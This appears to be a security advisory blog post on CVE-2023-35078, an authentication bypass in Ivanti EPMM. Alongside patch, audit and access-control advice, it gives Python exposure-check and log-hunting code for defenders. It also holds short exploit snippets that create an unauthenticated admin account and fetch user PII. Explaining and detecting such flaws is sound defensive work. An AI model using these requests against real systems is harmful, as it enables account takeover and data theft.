In July 2023, a critical vulnerability was discovered in Ivanti Endpoint Manager Mobile (EPMM), formerly known as MobileIron Core. This security hole, tracked as CVE-2023-35078, allows attackers to bypass authentication and gain admin access. It was exploited in the wild before a patch was released, putting thousands of organizations at risk. In this post, you’ll learn what the bug is, how the attack works, what the code looks like, and how you can protect your systems.

What is CVE-2023-35078?

CVE-2023-35078 is an authentication bypass vulnerability in Ivanti EPMM (MobileIron Core) versions up to 11.10. This bug lets a remote attacker skip login altogether—giving them unauthorized access to sensitive information, the ability to add admin users, and even change device management policies.

If you run Ivanti EPMM (MobileIron Core) and have not patched recently, you may be exposed.

Official Advisory

- Ivanti Security Advisory: CVE-2023-35078
- National Vulnerability Database: CVE-2023-35078

How Bad Is This Vulnerability?

The flaw scored a CVSS 9.8/10 (Critical) and affects most deployments. What makes it especially dangerous:

Vulnerable API Endpoints

Ivanti EPMM exposes several API endpoints that were meant for internal use only. Due to a misconfiguration, these endpoints did not require proper authentication. Anyone with network access (including the internet, if not properly firewalled) could reach them.

Example Exploit: Creating an Admin User

Let’s look at a (redacted and simplified) Python code snippet showing how an attacker could add an admin account using the flaw.

import requests

TARGET = "https://vulnerable-epmm.example.com"
NEW_ADMIN = {
    "username": "pwnedadmin",
    "password": "SuperSecurePassword123!",
    "role": "admin"
}

url = f"{TARGET}/api/v2/admins"
r = requests.post(url, json=NEW_ADMIN, verify=False)  # No authentication headers!

if r.status_code == 201:
    print("[+] Successfully created a new admin account!")
else:
    print("[-] Failed, status:", r.status_code, r.text)

The above code sends a POST request directly to an admin creation endpoint — without any login or authentication cookies!

Fetching PII with a Simple GET Request

PII (user emails, phone numbers, more) could also be leaked via unauthenticated GET requests.

# Continues the snippet above (same `requests` import and TARGET)
url = f"{TARGET}/api/v2/users"
r = requests.get(url, verify=False)  # No credentials needed!
print(r.json())

You are exposed if your EPMM instance is reachable from the internet, and even internal or VPN users can exploit it from inside the network.

You can test exposure by sending a request to /api/v2/diagnostics (or similar endpoint). If you receive diagnostic information without logging in, you are exposed.
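To make that check repeatable, here is an added example (not code from this post or from Ivanti) that sends one unauthenticated GET to the diagnostics path using only the Python standard library and classifies the answer. The path `/api/v2/diagnostics` is the one named above and is treated as an assumption for your build. A 200 with a JSON body means the endpoint answered with no session at all; a 401 or 403 means it is gated; a 200 that is HTML usually means you were redirected to the login page, which is not exposure.

```python
"""Unauthenticated exposure check for the EPMM diagnostics endpoint.

Added example; the endpoint path is taken from the post and is an assumption.
Uses only the standard library so it runs anywhere.
"""
import json
import urllib.error
import urllib.request

# Path named in the post; verify it against your own EPMM build.
DIAGNOSTICS_PATH = "/api/v2/diagnostics"


def classify_response(status, content_type, body):
    """Decide what an unauthenticated response to the endpoint tells us.

    Returns "EXPOSED", "PROTECTED" or "UNKNOWN".
    """
    if status in (401, 403):
        # Authentication is being enforced.
        return "PROTECTED"
    if status == 200:
        if "json" in (content_type or "").lower():
            try:
                json.loads(body)
            except ValueError:
                return "UNKNOWN"
            # Diagnostic data came back with no session: this is the exposure.
            return "EXPOSED"
        # A 200 that is not JSON is most often the login page after a redirect.
        return "UNKNOWN"
    return "UNKNOWN"


def check_exposure(base_url, timeout=10, ssl_context=None):
    """Send a single unauthenticated GET and return (status, verdict).

    ssl_context lets you pass a context that trusts your internal CA; the
    default keeps certificate verification on.
    """
    req = urllib.request.Request(
        base_url.rstrip("/") + DIAGNOSTICS_PATH,
        headers={"Accept": "application/json"},
    )
    try:
        with urllib.request.urlopen(req, timeout=timeout, context=ssl_context) as resp:
            status = resp.status
            ctype = resp.headers.get("Content-Type", "")
            body = resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        # 401/403 arrive as exceptions with urllib; still a useful answer.
        status = err.code
        ctype = err.headers.get("Content-Type", "")
        body = err.read().decode("utf-8", "replace")
    return status, classify_response(status, ctype, body)


if __name__ == "__main__":
    import sys

    # Usage: python check_epmm.py https://epmm.internal.example
    print(check_exposure(sys.argv[1]))
```

Run it against your own instance from an address that should not be trusted (an internet egress point or a guest VLAN); anything other than PROTECTED deserves a closer look, and EXPOSED means patch and audit now.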

1. Patch Immediately

Apply the latest Ivanti patch (such as 11.8.1.1) as soon as possible.

2. Audit for Compromise

Because this was exploited in the wild, check your admin accounts, review EPMM config history, and look for new or suspicious accounts that you did not create.
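As an added example of that audit step (not code from this post or from Ivanti), the helpers below do two things: diff the admin accounts you see now against a known-good baseline, and scan web access log lines for hits on the endpoints named above that succeeded with no authenticated user. The log format is assumed to be Apache combined style with the usual `-` placeholder in the user field, and the sample lines are constructed; EPMM's real log layout may differ, so adjust `LOG_RE` before using it on real data.

```python
"""Compromise-hunting helpers for an EPMM instance.

Added example. The log format, the field names and the sample lines are
assumptions; only the endpoint paths come from the post.
"""
import re

# Endpoints from the post that must never answer without a session.
SENSITIVE_ENDPOINTS = ("/api/v2/admins", "/api/v2/users", "/api/v2/diagnostics")

# Assumed Apache combined-style line: ip ident user [ts] "METHOD path proto" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Constructed sample log; 203.0.113.7 acts as an external address.
SAMPLE_LOG = [
    '203.0.113.7 - - [25/Jul/2023:07:20:01 +0000] "GET /api/v2/diagnostics HTTP/1.1" 200 1842',
    '203.0.113.7 - - [25/Jul/2023:07:20:05 +0000] "POST /api/v2/admins HTTP/1.1" 201 97',
    '10.20.0.5 - opsadmin [25/Jul/2023:07:21:13 +0000] "GET /api/v2/users HTTP/1.1" 200 5120',
    '198.51.100.9 - - [25/Jul/2023:07:22:40 +0000] "GET /api/v2/users HTTP/1.1" 401 0',
    '10.20.0.5 - opsadmin [25/Jul/2023:07:23:00 +0000] "GET /login HTTP/1.1" 200 3000',
]


def find_unexpected_admins(baseline, current):
    """Return admin usernames present now but absent from the known-good baseline.

    Both inputs are iterables of usernames (for example exported from the admin
    console before and after the incident window). Comparison is case-insensitive.
    """
    known = {u.strip().lower() for u in baseline}
    return sorted({u.strip() for u in current if u.strip().lower() not in known})


def scan_access_log(lines):
    """Flag 2xx requests to sensitive endpoints that carried no authenticated user.

    Returns one dict per suspicious line. An admin creation (POST .../admins
    answered with 201) is rated critical; any other unauthenticated success is high.
    """
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines in another format rather than guess
        path = m.group("path").split("?", 1)[0]
        if not path.startswith(SENSITIVE_ENDPOINTS):
            continue
        status = int(m.group("status"))
        unauthenticated = m.group("user") == "-"
        # Only a 2xx counts as success; a 302 to the login page is not a hit.
        if 200 <= status < 300 and unauthenticated:
            critical = m.group("method") == "POST" and status == 201
            findings.append({
                "ip": m.group("ip"),
                "ts": m.group("ts"),
                "method": m.group("method"),
                "path": path,
                "status": status,
                "severity": "critical" if critical else "high",
            })
    return findings


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"{f['severity']:8} {f['ts']} {f['ip']} {f['method']} {f['path']} -> {f['status']}")
    print(find_unexpected_admins(["alice", "bob"], ["Alice", "bob", "pwnedadmin"]))
```

If your web tier authenticates with session cookies rather than HTTP auth, the user field will read `-` for everyone; in that case correlate the flagged requests with the application's own session or audit log before treating them as confirmed, but an unauthenticated 201 on the admin endpoint from an unexpected address is worth escalating on its own.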

3. Restrict EPMM Access

Only allow connections to your EPMM system from management networks.

4. Monitor Ivanti Security Advisories

Stay up to date with Ivanti’s support forums and CISA guidance.

Real-World Attacks

In July 2023, threat actors were spotted exploiting CVE-2023-35078 in Norway, targeting government and private organizations. Attackers leveraged it to gain unauthorized access and steal data.

Source: Norwegian National Security Authority warning

Summary

CVE-2023-35078 is a simple but devastating bug—letting attackers take over Ivanti EPMM with no login. If you use EPMM, patch now, check for compromise, and tighten your access controls.

Don’t wait: This vulnerability is widely attacked, and exploits are easy to run. Stay safe!

Further Reading

- Ivanti Security Bulletin
- Rapid7 Analysis
- NIST NVD Entry
Need technical help? Ivanti customers can reach out via Ivanti Support Portal. Secure your systems!

Timeline

Published on: 07/25/2023 07:15:10 UTC
Last modified on: 08/04/2023 18:30:34 UTC